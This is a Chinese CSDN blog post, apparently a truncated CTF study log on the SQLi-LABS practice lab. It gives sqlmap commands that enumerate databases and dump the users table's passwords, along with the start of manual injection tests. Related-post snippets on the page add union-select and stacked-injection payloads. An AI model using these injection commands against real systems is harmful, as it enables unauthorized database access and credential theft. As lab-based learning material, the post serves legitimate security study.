二、CTF-Web-SQLi-Labs(记录CTF学习)

已于 2022-12-16 23:16:42 修改
阅读量360 收藏 2
点赞数 1
文章标签: 学习 sql
于 2022-12-16 23:15:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_27920699/article/details/128349063
版权
本文详细记录了在SQLi-LABS Page-1中的基础挑战,包括字符型、整数型、闭合方式不同及报错注入等方法的实战应用,涉及SQLMap工具和手动注入技巧,涵盖了数据库信息、表信息、列信息的爆破过程。
摘要由CSDN通过智能技术生成

目录

SQLi-LABS Page-1(Basic Challenges)

Less-1 **Error Based- String**(字符型注入')

Less-2 **Error Based- Intiger**(整数型注入)

Less-3 Error Based- String (with Twist)(闭合'))

Less-4 Error Based- DoubleQuotes String(闭合"))

Less-5 Double Query- Single Quotes- String(报错注入)

注1:首先要判断闭合方式

注2:一定要注意url地址栏的闭合符合中英文

注3:url编码:空格为20%,'为27%,#为23%

SQLi-LABS Page-1(Basic Challenges)

Less-1 **Error Based- String**(字符型注入')

        less-1 字符型注入_C4n的博客-CSDN博客_字符型注入

        https://www.cnblogs.com/Timesi/p/16659193.html

        方法一:SQLMAP注入

        (1)判断注入点

        sqlmap -u "url?id=1"

        (2)爆数据库信息

        sqlmap -u "url?id=1" --dbs

        (3)爆当前数据库信息(security)

        sqlmap -u "url?id=1" --current-db

        (4)爆指定数据库中所有表信息(users)

        sqlmap -u "url?id=1" -D security --tables

        (5)爆指定表的所有列的段名(username,password)

        sqlmap -u "url?id=1" -D security -T users --columns

        (6)爆表中所有内容(爆库)

        sqlmap -u "url?id=1" -D security -T users -C id,password,username --dump

        方法二:手工注入

        (1)判断注入点

        url?id=1’报错

        (2)判断注入类型

        如果是数字型注入:

        1 and 1=1 正确

        1 and 1=2 错误

        select * from table_name where id=xxx

最低0.47元/天 解锁文章
YangSNly
关注
CTF-Web-SQL注入(记录CTF学习
qq_27920699的博客
12-16 446
个人CTF学习之路
sqli-labs-master
08-22
sqli-labs-master是一个练习sql注入的代码环境
CTFweb篇——upload-labs
suiyideAli的博客
09-24 1483
0x00 前言 本次以upload-labs的Pass-00和pass-01为例。 0x01 进入靶场 pass-00 首先查看Pass-00题目,任务要求上传一个webshell到服务器,编写一句话木马,然后上传 右键复制图像地址,连接菜刀: 找到flag,提交,OK。 0x02 Pass-01(方法一) 查看题目要求,也是需要我上传一个webshell到服务器...
记一道CTF 中遇到的SQL注入新型万能密码问题
大方子
10-09 8399
0x00. 引言 我们平时遇到的SQL注入万能密码都是形如admin' or '1'='1, 这种使用or 关键字使得查询结果永真,或者形如:' UNION Select 1,1,1 FROM admin Where ''=',这种使用union使得查询结果永真, 但是有一次我在CTF的比赛中遇到的SQL注入问题,使用这两种万能密码都不好使,不管怎么变换形式,都不好使,显然是or和union ...
青少年CTF平台---sqli-labs
t235336456的博客
11-30 493
看到有个flag表然后查看段名(id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='flag' --+)查数据(id=-1' union select 1,group_concat(0x7e,flag),3 from security.flag --+)题目:sqli-labs。到4的时候会返回错误信息。
i春秋之SQLi--“百度杯”CTF比赛 九月场
金 帛的博客
04-04 957
i春秋WP
BUUCTF-sqli-labs1
Nothing-one的博客
07-16 1631
根据题目内容他让我们(请输入id作为带数值的参数 )这个为数字型注入。 这里面我用了sqlmap工具来进行解题。 在里面输入 python sqlmap.py -u +(网站名)(记住在网站名后面要加入?id=1) --dbs #获取数据库 这样我们就可以获得数据库中的名称了。 下面我们就要看数据库中的表明了。 python sqlmap.py -u +(网站名) -D 数据库名 --tables #列出表名 我们知道了表名,下面我们就要爆出字段名。 python sqlmap.py -u +(网站名)
sqli-labs-php7-master.zip
04-06
在这个背景下,"sqli-labs-php7-master.zip"是一个专为Web安全学习者设计的练习平台,它专注于SQL注入(SQL Injection)这一重要的攻击手段。这个压缩包包含了一个名为"sqli-labs-php7-master"的项目,用于模拟各种...
CTFshow-sqli-labs
Leo8283的博客
04-20 725
CTFshow sql-labs刷题记录 1-4 分别用’、"、’)、")闭合,通过联合查询语句union获取flag。由于当前调用的库非存放flag的库,可以用手注,通过元数据库information_schema.schemata表(查找所有库名),information_schema.tables表(查找所有表名),information_schema.columns表查找列名,获取flag最终的位置。 查询所有数据库 union select 1,group_concat(schema_name),
SQL注入天书 sqli-labs
01-11
SQL注入天书 sqli-labs
sqli-labs-master-注入学习靶机
01-19
sqli-labs是一个非常好的学习sql注入的一个游戏教程,是一个印度程序猿的搬砖建造的,对于了解sqlmap的原理很有帮助。
CTF supersqli
热门推荐
艺博东的博客
09-25 1万+
题目来源: 强网杯 2019 题目描述: 随便注 题目场景: http://220.249.52.133:31334 (温馨提示:每次进入URL的端口号都不一样) 1、点击链接进入如下界面 2、‘1’—>提交 3、使用union select 爆字段 —>提交 4、1’;show databases;#—>提交 5、1’;show tables;#—>提交 6、1’;show columns from words;#(查询words表中所有列:)—>提交 7、
CTFer成长之路之CTF中的SQL注入
若把此心以学道,即身成佛有何难
02-20 1603
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
“百度杯”CTF比赛 九月场SQLi ---------mozhe
weixin_40709439的博客
08-25 1488
题目链接:https://www.ichunqiu.com/battalion 点击进去,查看源代码  发现login.php?id=1 一般是存在sql注入的,可是我测试了好几遍,sqlmap也跑过了,也没发现啥 没办法,查看了官方wp,说是存在index.php,并在其header头有真正的注入点 在index.php请求进行301重定向,明显发现上面的链接只差一个字母,...
网络知识扫盲
weixin_34416649的博客
05-29 143
SQL 注入 通过在用户可控参数中注入 SQL 语法,破坏原有 SQL 结构,达到编写程序时意料之外结果的攻击行为。其成因可以归结为以下两个原因叠加造成的: 1. 程序编写者在处理应用程序和数据库交互时,使用字符串拼接的方式构造 SQL 语句 2. 未对用户可控参数进行足够的过滤便将参数内容拼接进入到 SQL 语句中 XSS 跨站脚本攻击 跨站脚本攻击(Cross Site Script...
ctf supersqli
weixin_45945976的博客
10-28 338
堆叠注入 正常访问如下 在1后门加 ‘ 报错 可能存在注入: order by 测试猜测字段 发现有两个: union select 1,2查询回显,发现select、where等字符被过滤: 尝试堆叠注入 =1’ ;show databases;–+ 发现能够回显库名: 继续堆叠注入 =1’;show tables;–+ 堆叠注入爆出列名 =1’;show columns from words;–+ 没有敏感信息: 堆叠注入查询1919810931114514表中所有列 =1’;sho
“百度杯”CTF比赛 九月场 类型:Web 题目名称:SQLi ---不需要逗号的注入技巧
wkend的博客
05-09 3884
今天在i春秋做题的时候遇到了移到非常好的题目,于是在参考了wp的基础上自己复现了一遍,算作一种技巧的学习与收藏吧。 题目i春秋连接:https://www.ichunqiu.com/battalion?t=1&r=54791 访问地址,发现什么都没有, 查看页面源代码,发现提示 访问地址 http://69ef94c7ef5e47b580ed5c7bae472bc4c3b...
CTFWeb 简单SQL 通关教程
最新发布
qq_45196785的博客
09-26 211
2、简单SQL,查看题目-启动动态环境。7、打印输出表名指定列名字段的值数据。Seesea CTF,注册地址,1、练习中心-题目列表-Web。5、列出指定数据库所有的表名。6、列出指定表名的所有列名。3、sqlmap测试。
CTF-WEB入门指南:技能、资源与漏洞解析
Web安全方面,CTF通常涉及对网站应用程序的攻击与防御,以便学习和提高安全知识。 文档指出,首先,参与者需要明确参与CTF的目的,因为这将决定他们的投入程度。如果是出于职业发展的考虑,那么就需要有坚定的...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

YangSNly

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值